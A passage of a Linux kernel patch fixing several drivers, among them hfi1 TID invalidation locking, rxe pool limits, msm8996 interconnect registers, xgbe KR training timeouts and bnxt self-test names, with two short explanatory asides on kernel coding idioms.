++static int unprogram_rcvarray(struct hfi1_filedata *fd, u32 tidinfo)
+ {
+ 	struct hfi1_ctxtdata *uctxt = fd->uctxt;
+ 	struct hfi1_devdata *dd = uctxt->dd;
+@@ -769,9 +818,6 @@ static int unprogram_rcvarray(struct hfi1_filedata *fd, u32 tidinfo,
+ 	if (!node || node->rcventry != (uctxt->expected_base + rcventry))
+ 		return -EBADF;
+ 
+-	if (grp)
+-		*grp = node->grp;
+-
+ 	if (fd->use_mn)
+ 		mmu_interval_notifier_remove(&node->notifier);
+ 	cacheless_tid_rb_remove(fd, node);
+@@ -779,23 +825,34 @@ static int unprogram_rcvarray(struct hfi1_filedata *fd, u32 tidinfo,
+ 	return 0;
+ }
+ 
+-static void clear_tid_node(struct hfi1_filedata *fd, struct tid_rb_node *node)
++static void __clear_tid_node(struct hfi1_filedata *fd, struct tid_rb_node *node)
+ {
+ 	struct hfi1_ctxtdata *uctxt = fd->uctxt;
+ 	struct hfi1_devdata *dd = uctxt->dd;
+ 
++	mutex_lock(&node->invalidate_mutex);
++	if (node->freed)
++		goto done;
++	node->freed = true;
++
+ 	trace_hfi1_exp_tid_unreg(uctxt->ctxt, fd->subctxt, node->rcventry,
+ 				 node->npages,
+ 				 node->notifier.interval_tree.start, node->phys,
+ 				 node->dma_addr);
+ 
+-	/*
+-	 * Make sure device has seen the write before we unpin the
+-	 * pages.
+-	 */
++	/* Make sure device has seen the write before pages are unpinned */
+ 	hfi1_put_tid(dd, node->rcventry, PT_INVALID_FLUSH, 0, 0);
+ 
+ 	unpin_rcv_pages(fd, NULL, node, 0, node->npages, true);
++done:
++	mutex_unlock(&node->invalidate_mutex);
++}
++
++static void clear_tid_node(struct hfi1_filedata *fd, struct tid_rb_node *node)
++{
++	struct hfi1_ctxtdata *uctxt = fd->uctxt;
++
++	__clear_tid_node(fd, node);
+ 
+ 	node->grp->used--;
+ 	node->grp->map &= ~(1 << (node->rcventry - node->grp->base));
+@@ -854,10 +911,16 @@ static bool tid_rb_invalidate(struct mmu_interval_notifier *mni,
+ 	if (node->freed)
+ 		return true;
+ 
++	/* take action only if unmapping */
++	if (range->event != MMU_NOTIFY_UNMAP)
++		return true;
++
+ 	trace_hfi1_exp_tid_inval(uctxt->ctxt, fdata->subctxt,
+ 				 node->notifier.interval_tree.start,
+ 				 node->rcventry, node->npages, node->dma_addr);
+-	node->freed = true;
++
++	/* clear the hardware rcvarray entry */
++	__clear_tid_node(fdata, node);
+ 
+ 	spin_lock(&fdata->invalid_lock);
+ 	if (fdata->invalid_tid_idx < uctxt->expected_count) {
+@@ -887,6 +950,23 @@ static bool tid_rb_invalidate(struct mmu_interval_notifier *mni,
+ 	return true;
+ }
+ 
++static bool tid_cover_invalidate(struct mmu_interval_notifier *mni,
++			         const struct mmu_notifier_range *range,
++			         unsigned long cur_seq)
++{
++	struct tid_user_buf *tidbuf =
++		container_of(mni, struct tid_user_buf, notifier);
++
++	/* take action only if unmapping */
++	if (range->event == MMU_NOTIFY_UNMAP) {
++		mutex_lock(&tidbuf->cover_mutex);
++		mmu_interval_set_seq(mni, cur_seq);
++		mutex_unlock(&tidbuf->cover_mutex);
++	}
++
++	return true;
++}
++
+ static void cacheless_tid_rb_remove(struct hfi1_filedata *fdata,
+ 				    struct tid_rb_node *tnode)
+ {
+diff --git a/drivers/infiniband/hw/hfi1/user_exp_rcv.h b/drivers/infiniband/hw/hfi1/user_exp_rcv.h
+index 8c53e416bf843..f8ee997d0050e 100644
+--- a/drivers/infiniband/hw/hfi1/user_exp_rcv.h
++++ b/drivers/infiniband/hw/hfi1/user_exp_rcv.h
+@@ -16,6 +16,8 @@ struct tid_pageset {
+ };
+ 
+ struct tid_user_buf {
++	struct mmu_interval_notifier notifier;
++	struct mutex cover_mutex;
+ 	unsigned long vaddr;
+ 	unsigned long length;
+ 	unsigned int npages;
+@@ -27,6 +29,7 @@ struct tid_user_buf {
+ struct tid_rb_node {
+ 	struct mmu_interval_notifier notifier;
+ 	struct hfi1_filedata *fdata;
++	struct mutex invalidate_mutex; /* covers hw removal */
+ 	unsigned long phys;
+ 	struct tid_group *grp;
+ 	u32 rcventry;
+diff --git a/drivers/infiniband/sw/rxe/rxe_param.h b/drivers/infiniband/sw/rxe/rxe_param.h
+index 86c7a8bf3cbbd..fa41009ce8a9d 100644
+--- a/drivers/infiniband/sw/rxe/rxe_param.h
++++ b/drivers/infiniband/sw/rxe/rxe_param.h
+@@ -91,11 +91,11 @@ enum rxe_device_param {
+ 	RXE_MAX_SRQ			= DEFAULT_MAX_VALUE - RXE_MIN_SRQ_INDEX,
+ 
+ 	RXE_MIN_MR_INDEX		= 0x00000001,
+-	RXE_MAX_MR_INDEX		= DEFAULT_MAX_VALUE,
+-	RXE_MAX_MR			= DEFAULT_MAX_VALUE - RXE_MIN_MR_INDEX,
+-	RXE_MIN_MW_INDEX		= 0x00010001,
+-	RXE_MAX_MW_INDEX		= 0x00020000,
+-	RXE_MAX_MW			= 0x00001000,
++	RXE_MAX_MR_INDEX		= DEFAULT_MAX_VALUE >> 1,
++	RXE_MAX_MR			= RXE_MAX_MR_INDEX - RXE_MIN_MR_INDEX,
++	RXE_MIN_MW_INDEX		= RXE_MAX_MR_INDEX + 1,
++	RXE_MAX_MW_INDEX		= DEFAULT_MAX_VALUE,
++	RXE_MAX_MW			= RXE_MAX_MW_INDEX - RXE_MIN_MW_INDEX,
+ 
+ 	RXE_MAX_PKT_PER_ACK		= 64,
+ 
+diff --git a/drivers/infiniband/sw/rxe/rxe_pool.c b/drivers/infiniband/sw/rxe/rxe_pool.c
+index f50620f5a0a14..1151c0b5cceab 100644
+--- a/drivers/infiniband/sw/rxe/rxe_pool.c
++++ b/drivers/infiniband/sw/rxe/rxe_pool.c
+@@ -23,16 +23,16 @@ static const struct rxe_type_info {
+ 		.size		= sizeof(struct rxe_ucontext),
+ 		.elem_offset	= offsetof(struct rxe_ucontext, elem),
+ 		.min_index	= 1,
+-		.max_index	= UINT_MAX,
+-		.max_elem	= UINT_MAX,
++		.max_index	= RXE_MAX_UCONTEXT,
++		.max_elem	= RXE_MAX_UCONTEXT,
+ 	},
+ 	[RXE_TYPE_PD] = {
+ 		.name		= "pd",
+ 		.size		= sizeof(struct rxe_pd),
+ 		.elem_offset	= offsetof(struct rxe_pd, elem),
+ 		.min_index	= 1,
+-		.max_index	= UINT_MAX,
+-		.max_elem	= UINT_MAX,
++		.max_index	= RXE_MAX_PD,
++		.max_elem	= RXE_MAX_PD,
+ 	},
+ 	[RXE_TYPE_AH] = {
+ 		.name		= "ah",
+@@ -40,7 +40,7 @@ static const struct rxe_type_info {
+ 		.elem_offset	= offsetof(struct rxe_ah, elem),
+ 		.min_index	= RXE_MIN_AH_INDEX,
+ 		.max_index	= RXE_MAX_AH_INDEX,
+-		.max_elem	= RXE_MAX_AH_INDEX - RXE_MIN_AH_INDEX + 1,
++		.max_elem	= RXE_MAX_AH,
+ 	},
+ 	[RXE_TYPE_SRQ] = {
+ 		.name		= "srq",
+@@ -49,7 +49,7 @@ static const struct rxe_type_info {
+ 		.cleanup	= rxe_srq_cleanup,
+ 		.min_index	= RXE_MIN_SRQ_INDEX,
+ 		.max_index	= RXE_MAX_SRQ_INDEX,
+-		.max_elem	= RXE_MAX_SRQ_INDEX - RXE_MIN_SRQ_INDEX + 1,
++		.max_elem	= RXE_MAX_SRQ,
+ 	},
+ 	[RXE_TYPE_QP] = {
+ 		.name		= "qp",
+@@ -58,7 +58,7 @@ static const struct rxe_type_info {
+ 		.cleanup	= rxe_qp_cleanup,
+ 		.min_index	= RXE_MIN_QP_INDEX,
+ 		.max_index	= RXE_MAX_QP_INDEX,
+-		.max_elem	= RXE_MAX_QP_INDEX - RXE_MIN_QP_INDEX + 1,
++		.max_elem	= RXE_MAX_QP,
+ 	},
+ 	[RXE_TYPE_CQ] = {
+ 		.name		= "cq",
+@@ -66,8 +66,8 @@ static const struct rxe_type_info {
+ 		.elem_offset	= offsetof(struct rxe_cq, elem),
+ 		.cleanup	= rxe_cq_cleanup,
+ 		.min_index	= 1,
+-		.max_index	= UINT_MAX,
+-		.max_elem	= UINT_MAX,
++		.max_index	= RXE_MAX_CQ,
++		.max_elem	= RXE_MAX_CQ,
+ 	},
+ 	[RXE_TYPE_MR] = {
+ 		.name		= "mr",
+@@ -76,7 +76,7 @@ static const struct rxe_type_info {
+ 		.cleanup	= rxe_mr_cleanup,
+ 		.min_index	= RXE_MIN_MR_INDEX,
+ 		.max_index	= RXE_MAX_MR_INDEX,
+-		.max_elem	= RXE_MAX_MR_INDEX - RXE_MIN_MR_INDEX + 1,
++		.max_elem	= RXE_MAX_MR,
+ 	},
+ 	[RXE_TYPE_MW] = {
+ 		.name		= "mw",
+@@ -85,7 +85,7 @@ static const struct rxe_type_info {
+ 		.cleanup	= rxe_mw_cleanup,
+ 		.min_index	= RXE_MIN_MW_INDEX,
+ 		.max_index	= RXE_MAX_MW_INDEX,
+-		.max_elem	= RXE_MAX_MW_INDEX - RXE_MIN_MW_INDEX + 1,
++		.max_elem	= RXE_MAX_MW,
+ 	},
+ };
+ 
+diff --git a/drivers/input/mouse/synaptics.c b/drivers/input/mouse/synaptics.c
+index b0f776448a1cd..fa021af8506e4 100644
+--- a/drivers/input/mouse/synaptics.c
++++ b/drivers/input/mouse/synaptics.c
+@@ -192,7 +192,6 @@ static const char * const smbus_pnp_ids[] = {
+ 	"SYN3221", /* HP 15-ay000 */
+ 	"SYN323d", /* HP Spectre X360 13-w013dx */
+ 	"SYN3257", /* HP Envy 13-ad105ng */
+-	"SYN3286", /* HP Laptop 15-da3001TU */
+ 	NULL
+ };
+ 
+diff --git a/drivers/input/serio/i8042-acpipnpio.h b/drivers/input/serio/i8042-acpipnpio.h
+index 46f8a694291ed..efc61736099b9 100644
+--- a/drivers/input/serio/i8042-acpipnpio.h
++++ b/drivers/input/serio/i8042-acpipnpio.h
+@@ -1238,6 +1238,13 @@ static const struct dmi_system_id i8042_dmi_quirk_table[] __initconst = {
+ 		.driver_data = (void *)(SERIO_QUIRK_NOMUX | SERIO_QUIRK_RESET_ALWAYS |
+ 					SERIO_QUIRK_NOLOOP | SERIO_QUIRK_NOPNP)
+ 	},
++	{
++		.matches = {
++			DMI_MATCH(DMI_BOARD_NAME, "PCX0DX"),
++		},
++		.driver_data = (void *)(SERIO_QUIRK_NOMUX | SERIO_QUIRK_RESET_ALWAYS |
++					SERIO_QUIRK_NOLOOP | SERIO_QUIRK_NOPNP)
++	},
+ 	{
+ 		.matches = {
+ 			DMI_MATCH(DMI_BOARD_NAME, "X170SM"),
+diff --git a/drivers/interconnect/qcom/msm8996.c b/drivers/interconnect/qcom/msm8996.c
+index c2903ae3b3bc3..25a1a32bc611f 100644
+--- a/drivers/interconnect/qcom/msm8996.c
++++ b/drivers/interconnect/qcom/msm8996.c
+@@ -33,6 +33,13 @@ static const char * const bus_a0noc_clocks[] = {
+ 	"aggre0_noc_mpu_cfg"
+ };
+ 
++static const char * const bus_a2noc_clocks[] = {
++	"bus",
++	"bus_a",
++	"aggre2_ufs_axi",
++	"ufs_axi"
++};
++
+ static const u16 mas_a0noc_common_links[] = {
+ 	MSM8996_SLAVE_A0NOC_SNOC
+ };
+@@ -1806,7 +1813,7 @@ static const struct regmap_config msm8996_a0noc_regmap_config = {
+ 	.reg_bits	= 32,
+ 	.reg_stride	= 4,
+ 	.val_bits	= 32,
+-	.max_register	= 0x9000,
++	.max_register	= 0x6000,
+ 	.fast_io	= true
+ };
+ 
+@@ -1830,7 +1837,7 @@ static const struct regmap_config msm8996_a1noc_regmap_config = {
+ 	.reg_bits	= 32,
+ 	.reg_stride	= 4,
+ 	.val_bits	= 32,
+-	.max_register	= 0x7000,
++	.max_register	= 0x5000,
+ 	.fast_io	= true
+ };
+ 
+@@ -1851,7 +1858,7 @@ static const struct regmap_config msm8996_a2noc_regmap_config = {
+ 	.reg_bits	= 32,
+ 	.reg_stride	= 4,
+ 	.val_bits	= 32,
+-	.max_register	= 0xa000,
++	.max_register	= 0x7000,
+ 	.fast_io	= true
+ };
+ 
+@@ -1859,6 +1866,8 @@ static const struct qcom_icc_desc msm8996_a2noc = {
+ 	.type = QCOM_ICC_NOC,
+ 	.nodes = a2noc_nodes,
+ 	.num_nodes = ARRAY_SIZE(a2noc_nodes),
++	.clocks = bus_a2noc_clocks,
++	.num_clocks = ARRAY_SIZE(bus_a2noc_clocks),
+ 	.regmap_cfg = &msm8996_a2noc_regmap_config
+ };
+ 
+@@ -1877,7 +1886,7 @@ static const struct regmap_config msm8996_bimc_regmap_config = {
+ 	.reg_bits	= 32,
+ 	.reg_stride	= 4,
+ 	.val_bits	= 32,
+-	.max_register	= 0x62000,
++	.max_register	= 0x5a000,
+ 	.fast_io	= true
+ };
+ 
+@@ -1988,7 +1997,7 @@ static const struct regmap_config msm8996_mnoc_regmap_config = {
+ 	.reg_bits	= 32,
+ 	.reg_stride	= 4,
+ 	.val_bits	= 32,
+-	.max_register	= 0x20000,
++	.max_register	= 0x1c000,
+ 	.fast_io	= true
+ };
+ 
+diff --git a/drivers/memory/atmel-sdramc.c b/drivers/memory/atmel-sdramc.c
+index 9c49d00c2a966..ea6e9e1eaf046 100644
+--- a/drivers/memory/atmel-sdramc.c
++++ b/drivers/memory/atmel-sdramc.c
+@@ -47,19 +47,17 @@ static int atmel_ramc_probe(struct platform_device *pdev)
+ 	caps = of_device_get_match_data(&pdev->dev);
+ 
+ 	if (caps->has_ddrck) {
+-		clk = devm_clk_get(&pdev->dev, "ddrck");
++		clk = devm_clk_get_enabled(&pdev->dev, "ddrck");
+ 		if (IS_ERR(clk))
+ 			return PTR_ERR(clk);
+-		clk_prepare_enable(clk);
+ 	}
+ 
+ 	if (caps->has_mpddr_clk) {
+-		clk = devm_clk_get(&pdev->dev, "mpddr");
++		clk = devm_clk_get_enabled(&pdev->dev, "mpddr");
+ 		if (IS_ERR(clk)) {
+ 			pr_err("AT91 RAMC: couldn't get mpddr clock\n");
+ 			return PTR_ERR(clk);
+ 		}
+-		clk_prepare_enable(clk);
+ 	}
+ 
+ 	return 0;
+diff --git a/drivers/memory/mvebu-devbus.c b/drivers/memory/mvebu-devbus.c
+index 8450638e86700..efc6c08db2b70 100644
+--- a/drivers/memory/mvebu-devbus.c
++++ b/drivers/memory/mvebu-devbus.c
+@@ -280,10 +280,9 @@ static int mvebu_devbus_probe(struct platform_device *pdev)
+ 	if (IS_ERR(devbus->base))
+ 		return PTR_ERR(devbus->base);
+ 
+-	clk = devm_clk_get(&pdev->dev, NULL);
++	clk = devm_clk_get_enabled(&pdev->dev, NULL);
+ 	if (IS_ERR(clk))
+ 		return PTR_ERR(clk);
+-	clk_prepare_enable(clk);
+ 
+ 	/*
+ 	 * Obtain clock period in picoseconds,
+diff --git a/drivers/memory/tegra/tegra186.c b/drivers/memory/tegra/tegra186.c
+index 62477e592bf5f..7bb73f06fad3e 100644
+--- a/drivers/memory/tegra/tegra186.c
++++ b/drivers/memory/tegra/tegra186.c
+@@ -22,32 +22,6 @@
+ #define MC_SID_STREAMID_SECURITY_WRITE_ACCESS_DISABLED BIT(16)
+ #define MC_SID_STREAMID_SECURITY_OVERRIDE BIT(8)
+ 
+-static void tegra186_mc_program_sid(struct tegra_mc *mc)
+-{
+-	unsigned int i;
+-
+-	for (i = 0; i < mc->soc->num_clients; i++) {
+-		const struct tegra_mc_client *client = &mc->soc->clients[i];
+-		u32 override, security;
+-
+-		override = readl(mc->regs + client->regs.sid.override);
+-		security = readl(mc->regs + client->regs.sid.security);
+-
+-		dev_dbg(mc->dev, "client %s: override: %x security: %x\n",
+-			client->name, override, security);
+-
+-		dev_dbg(mc->dev, "setting SID %u for %s\n", client->sid,
+-			client->name);
+-		writel(client->sid, mc->regs + client->regs.sid.override);
+-
+-		override = readl(mc->regs + client->regs.sid.override);
+-		security = readl(mc->regs + client->regs.sid.security);
+-
+-		dev_dbg(mc->dev, "client %s: override: %x security: %x\n",
+-			client->name, override, security);
+-	}
+-}
+-
+ static int tegra186_mc_probe(struct tegra_mc *mc)
+ {
+ 	struct platform_device *pdev = to_platform_device(mc->dev);
+@@ -85,8 +59,6 @@ populate:
+ 	if (err < 0)
+ 		return err;
+ 
+-	tegra186_mc_program_sid(mc);
+-
+ 	return 0;
+ }
+ 
+@@ -95,13 +67,6 @@ static void tegra186_mc_remove(struct tegra_mc *mc)
+ 	of_platform_depopulate(mc->dev);
+ }
+ 
+-static int tegra186_mc_resume(struct tegra_mc *mc)
+-{
+-	tegra186_mc_program_sid(mc);
+-
+-	return 0;
+-}
+-
+ #if IS_ENABLED(CONFIG_IOMMU_API)
+ static void tegra186_mc_client_sid_override(struct tegra_mc *mc,
+ 					    const struct tegra_mc_client *client,
+@@ -173,7 +138,6 @@ static int tegra186_mc_probe_device(struct tegra_mc *mc, struct device *dev)
+ const struct tegra_mc_ops tegra186_mc_ops = {
+ 	.probe = tegra186_mc_probe,
+ 	.remove = tegra186_mc_remove,
+-	.resume = tegra186_mc_resume,
+ 	.probe_device = tegra186_mc_probe_device,
+ 	.handle_irq = tegra30_mc_handle_irq,
+ };
+diff --git a/drivers/net/dsa/microchip/ksz9477.c b/drivers/net/dsa/microchip/ksz9477.c
+index a6a0321a89310..a736971470534 100644
+--- a/drivers/net/dsa/microchip/ksz9477.c
++++ b/drivers/net/dsa/microchip/ksz9477.c
+@@ -548,10 +548,10 @@ int ksz9477_fdb_del(struct ksz_device *dev, int port,
+ 		ksz_read32(dev, REG_SW_ALU_VAL_D, &alu_table[3]);
+ 
+ 		/* clear forwarding port */
+-		alu_table[2] &= ~BIT(port);
++		alu_table[1] &= ~BIT(port);
+ 
+ 		/* if there is no port to forward, clear table */
+-		if ((alu_table[2] & ALU_V_PORT_MAP) == 0) {
++		if ((alu_table[1] & ALU_V_PORT_MAP) == 0) {
+ 			alu_table[0] = 0;
+ 			alu_table[1] = 0;
+ 			alu_table[2] = 0;
+diff --git a/drivers/net/dsa/microchip/ksz9477_i2c.c b/drivers/net/dsa/microchip/ksz9477_i2c.c
+index 3763930dc6fc4..aae1dadef882d 100644
+--- a/drivers/net/dsa/microchip/ksz9477_i2c.c
++++ b/drivers/net/dsa/microchip/ksz9477_i2c.c
+@@ -105,7 +105,7 @@ static const struct of_device_id ksz9477_dt_ids[] = {
+ 	},
+ 	{
+ 		.compatible = "microchip,ksz8563",
+-		.data = &ksz_switch_chips[KSZ9893]
++		.data = &ksz_switch_chips[KSZ8563]
+ 	},
+ 	{
+ 		.compatible = "microchip,ksz9567",
+diff --git a/drivers/net/ethernet/adi/adin1110.c b/drivers/net/ethernet/adi/adin1110.c
+index 9d8dfe1729948..ecce5f7a549f2 100644
+--- a/drivers/net/ethernet/adi/adin1110.c
++++ b/drivers/net/ethernet/adi/adin1110.c
+@@ -356,7 +356,7 @@ static int adin1110_read_fifo(struct adin1110_port_priv *port_priv)
+ 
+ 	if ((port_priv->flags & IFF_ALLMULTI && rxb->pkt_type == PACKET_MULTICAST) ||
+ 	    (port_priv->flags & IFF_BROADCAST && rxb->pkt_type == PACKET_BROADCAST))
+-		rxb->offload_fwd_mark = 1;
++		rxb->offload_fwd_mark = port_priv->priv->forwarding;
+ 
+ 	netif_rx(rxb);
+ 
+diff --git a/drivers/net/ethernet/amd/xgbe/xgbe-dev.c b/drivers/net/ethernet/amd/xgbe/xgbe-dev.c
+index 3936543a74d8f..4030d619e84f5 100644
+--- a/drivers/net/ethernet/amd/xgbe/xgbe-dev.c
++++ b/drivers/net/ethernet/amd/xgbe/xgbe-dev.c
+@@ -524,19 +524,28 @@ static void xgbe_disable_vxlan(struct xgbe_prv_data *pdata)
+ 	netif_dbg(pdata, drv, pdata->netdev, "VXLAN acceleration disabled\n");
+ }
+ 
++static unsigned int xgbe_get_fc_queue_count(struct xgbe_prv_data *pdata)
++{
++	unsigned int max_q_count = XGMAC_MAX_FLOW_CONTROL_QUEUES;
++
++	/* From MAC ver 30H the TFCR is per priority, instead of per queue */
++	if (XGMAC_GET_BITS(pdata->hw_feat.version, MAC_VR, SNPSVER) >= 0x30)
++		return max_q_count;
++	else
++		return min_t(unsigned int, pdata->tx_q_count, max_q_count);
++}
++
+ static int xgbe_disable_tx_flow_control(struct xgbe_prv_data *pdata)
+ {
+-	unsigned int max_q_count, q_count;
+ 	unsigned int reg, reg_val;
+-	unsigned int i;
++	unsigned int i, q_count;
+ 
+ 	/* Clear MTL flow control */
+ 	for (i = 0; i < pdata->rx_q_count; i++)
+ 		XGMAC_MTL_IOWRITE_BITS(pdata, i, MTL_Q_RQOMR, EHFC, 0);
+ 
+ 	/* Clear MAC flow control */
+-	max_q_count = XGMAC_MAX_FLOW_CONTROL_QUEUES;
+-	q_count = min_t(unsigned int, pdata->tx_q_count, max_q_count);
++	q_count = xgbe_get_fc_queue_count(pdata);
+ 	reg = MAC_Q0TFCR;
+ 	for (i = 0; i < q_count; i++) {
+ 		reg_val = XGMAC_IOREAD(pdata, reg);
+@@ -553,9 +562,8 @@ static int xgbe_enable_tx_flow_control(struct xgbe_prv_data *pdata)
+ {
+ 	struct ieee_pfc *pfc = pdata->pfc;
+ 	struct ieee_ets *ets = pdata->ets;
+-	unsigned int max_q_count, q_count;
+ 	unsigned int reg, reg_val;
+-	unsigned int i;
++	unsigned int i, q_count;
+ 
+ 	/* Set MTL flow control */
+ 	for (i = 0; i < pdata->rx_q_count; i++) {
+@@ -579,8 +587,7 @@ static int xgbe_enable_tx_flow_control(struct xgbe_prv_data *pdata)
+ 	}
+ 
+ 	/* Set MAC flow control */
+-	max_q_count = XGMAC_MAX_FLOW_CONTROL_QUEUES;
+-	q_count = min_t(unsigned int, pdata->tx_q_count, max_q_count);
++	q_count = xgbe_get_fc_queue_count(pdata);
+ 	reg = MAC_Q0TFCR;
+ 	for (i = 0; i < q_count; i++) {
+ 		reg_val = XGMAC_IOREAD(pdata, reg);
+diff --git a/drivers/net/ethernet/amd/xgbe/xgbe-mdio.c b/drivers/net/ethernet/amd/xgbe/xgbe-mdio.c
+index 0c5c1b1556830..43fdd111235a6 100644
+--- a/drivers/net/ethernet/amd/xgbe/xgbe-mdio.c
++++ b/drivers/net/ethernet/amd/xgbe/xgbe-mdio.c
+@@ -496,6 +496,7 @@ static enum xgbe_an xgbe_an73_tx_training(struct xgbe_prv_data *pdata,
+ 	reg |= XGBE_KR_TRAINING_ENABLE;
+ 	reg |= XGBE_KR_TRAINING_START;
+ 	XMDIO_WRITE(pdata, MDIO_MMD_PMAPMD, MDIO_PMA_10GBR_PMD_CTRL, reg);
++	pdata->kr_start_time = jiffies;
+ 
+ 	netif_dbg(pdata, link, pdata->netdev,
+ 		  "KR training initiated\n");
+@@ -632,6 +633,8 @@ static enum xgbe_an xgbe_an73_incompat_link(struct xgbe_prv_data *pdata)
+ 
+ 	xgbe_switch_mode(pdata);
+ 
++	pdata->an_result = XGBE_AN_READY;
++
+ 	xgbe_an_restart(pdata);
+ 
+ 	return XGBE_AN_INCOMPAT_LINK;
+@@ -1275,9 +1278,30 @@ static bool xgbe_phy_aneg_done(struct xgbe_prv_data *pdata)
+ static void xgbe_check_link_timeout(struct xgbe_prv_data *pdata)
+ {
+ 	unsigned long link_timeout;
++	unsigned long kr_time;
++	int wait;
+ 
+ 	link_timeout = pdata->link_check + (XGBE_LINK_TIMEOUT * HZ);
+ 	if (time_after(jiffies, link_timeout)) {
++		if ((xgbe_cur_mode(pdata) == XGBE_MODE_KR) &&
++		    pdata->phy.autoneg == AUTONEG_ENABLE) {
++			/* AN restart should not happen while KR training is in progress.
++			 * The while loop below guards against that: it waits up to
++			 * 500 ms and triggers an AN restart only if KR training
++			 * has failed.
++			 */
++			wait = XGBE_KR_TRAINING_WAIT_ITER;
++			while (wait--) {
++				kr_time = pdata->kr_start_time +
++					  msecs_to_jiffies(XGBE_AN_MS_TIMEOUT);
++				if (time_after(jiffies, kr_time))
++					break;
++				/* AN restart is not required, if AN result is COMPLETE */
++				if (pdata->an_result == XGBE_AN_COMPLETE)
++					return;
++				usleep_range(10000, 11000);
++			}
++		}
+ 		netif_dbg(pdata, link, pdata->netdev, "AN link timeout\n");
+ 		xgbe_phy_config_aneg(pdata);
+ 	}
+diff --git a/drivers/net/ethernet/amd/xgbe/xgbe.h b/drivers/net/ethernet/amd/xgbe/xgbe.h
+index 71f24cb479355..7a41367c437dd 100644
+--- a/drivers/net/ethernet/amd/xgbe/xgbe.h
++++ b/drivers/net/ethernet/amd/xgbe/xgbe.h
+@@ -290,6 +290,7 @@
+ /* Auto-negotiation */
+ #define XGBE_AN_MS_TIMEOUT		500
+ #define XGBE_LINK_TIMEOUT		5
++#define XGBE_KR_TRAINING_WAIT_ITER	50
+ 
+ #define XGBE_SGMII_AN_LINK_STATUS	BIT(1)
+ #define XGBE_SGMII_AN_LINK_SPEED	(BIT(2) | BIT(3))
+@@ -1280,6 +1281,7 @@ struct xgbe_prv_data {
+ 	unsigned int parallel_detect;
+ 	unsigned int fec_ability;
+ 	unsigned long an_start;
++	unsigned long kr_start_time;
+ 	enum xgbe_an_mode an_mode;
+ 
+ 	/* I2C support */
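
The KR-training guard added above is an instance of the kernel's jiffies deadline-polling idiom: record a start time, derive a deadline with msecs_to_jiffies(), and compare against jiffies with time_after() so counter wraparound stays correct. A minimal standalone sketch of that idiom follows; poll_until_deadline(), done() and ctx are illustrative names, not part of the patch.

#include <linux/jiffies.h>
#include <linux/delay.h>

/* Poll done() every ~10 ms until it succeeds or wait_ms elapses from
 * start_time; time_after() is wraparound-safe on jiffies.
 */
static bool poll_until_deadline(unsigned long start_time, unsigned int wait_ms,
				bool (*done)(void *ctx), void *ctx)
{
	unsigned long deadline = start_time + msecs_to_jiffies(wait_ms);

	while (!time_after(jiffies, deadline)) {
		if (done(ctx))
			return true;
		usleep_range(10000, 11000);
	}
	return false;
}
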
+diff --git a/drivers/net/ethernet/broadcom/bnxt/bnxt_ethtool.c b/drivers/net/ethernet/broadcom/bnxt/bnxt_ethtool.c
+index 8cad15c458b39..703fc163235f9 100644
+--- a/drivers/net/ethernet/broadcom/bnxt/bnxt_ethtool.c
++++ b/drivers/net/ethernet/broadcom/bnxt/bnxt_ethtool.c
+@@ -3865,7 +3865,7 @@ void bnxt_ethtool_init(struct bnxt *bp)
+ 		test_info->timeout = HWRM_CMD_TIMEOUT;
+ 	for (i = 0; i < bp->num_tests; i++) {
+ 		char *str = test_info->string[i];
+-		char *fw_str = resp->test0_name + i * 32;
++		char *fw_str = resp->test_name[i];
+ 
+ 		if (i == BNXT_MACLPBK_TEST_IDX) {
+ 			strcpy(str, "Mac loopback test (offline)");
+@@ -3876,14 +3876,9 @@ void bnxt_ethtool_init(struct bnxt *bp)
+ 		} else if (i == BNXT_IRQ_TEST_IDX) {
+ 			strcpy(str, "Interrupt_test (offline)");
+ 		} else {
+-			strscpy(str, fw_str, ETH_GSTRING_LEN);
+-			strncat(str, " test", ETH_GSTRING_LEN - strlen(str));
+-			if (test_info->offline_mask & (1 << i))
+-				strncat(str, " (offline)",
+-					ETH_GSTRING_LEN - strlen(str));
+-			else
+-				strncat(str, " (online)",
+-					ETH_GSTRING_LEN - strlen(str));
++			snprintf(str, ETH_GSTRING_LEN, "%s test (%s)",
++				 fw_str, test_info->offline_mask & (1 << i) ?
++					"offline" : "online");
+ 		}
+ 	}
+ 
+diff --git a/drivers/net/ethernet/broadcom/bnxt/bnxt_hsi.h b/drivers/net/ethernet/broadcom/bnxt/bnxt_hsi.h
+index b753032a10474..fb78fc38530da 100644
+--- a/drivers/net/ethernet/broadcom/bnxt/bnxt_hsi.h
++++ b/drivers/net/ethernet/broadcom/bnxt/bnxt_hsi.h
+@@ -10099,14 +10099,7 @@ struct hwrm_selftest_qlist_output {
+ 	u8	unused_0;
+ 	__le16	test_timeout;
+ 	u8	unused_1[2];
+-	char	test0_name[32];
+-	char	test1_name[32];
+-	char	test2_name[32];
+-	char	test3_name[32];
+-	char	test4_name[32];
+-	char	test5_name[32];
+-	char	test6_name[32];
+-	char	test7_name[32];
++	char	test_name[8][32];
+ 	u8	eyescope_target_BER_support;
+ 	#define SELFTEST_QLIST_RESP_EYESCOPE_TARGET_BER_SUPPORT_BER_1E8_SUPPORTED  0x0UL
+ 	#define SELFTEST_QLIST_RESP_EYESCOPE_TARGET_BER_SUPPORT_BER_1E9_SUPPORTED  0x1UL
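
The bnxt ethtool hunk above trades a strscpy()/strncat() chain, whose ETH_GSTRING_LEN - strlen() arithmetic is easy to get wrong, for one bounded snprintf(); the companion header hunk folds the eight fixed-size name fields into a 2-D array so each name can be indexed directly. The formatting pattern in isolation, as a hedged sketch with NAME_LEN standing in for ETH_GSTRING_LEN:

#include <linux/kernel.h>

#define NAME_LEN 32	/* stand-in for ETH_GSTRING_LEN */

/* snprintf() always NUL-terminates and never writes past NAME_LEN,
 * so no manual remaining-space bookkeeping is needed.
 */
static void format_test_name(char dst[NAME_LEN], const char *fw_name,
			     bool offline)
{
	snprintf(dst, NAME_LEN, "%s test (%s)",
		 fw_name, offline ? "offline" : "online");
}
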
+diff --git a/drivers/net/ethernet/broadcom/tg3.c b/drivers/net/ethernet/broadcom/tg3.c
+index 4179a12fc8819..af9ea5e4371b3 100644
+--- a/drivers/net/ethernet/broadcom/tg3.c
++++ b/drivers/net/ethernet/broadcom/tg3.c
+@@ -11174,7 +11174,7 @@ static void tg3_reset_task(struct work_struct *work)
+ 	rtnl_lock();
+ 	tg3_full_lock(tp, 0);
+ 
+-	if (!netif_running(tp->dev)) {
++	if (tp->pcierr_recovery || !netif_running(tp->dev)) {
+ 		tg3_flag_clear(tp, RESET_TASK_PENDING);
+ 		tg3_full_unlock(tp);
+ 		rtnl_unlock();
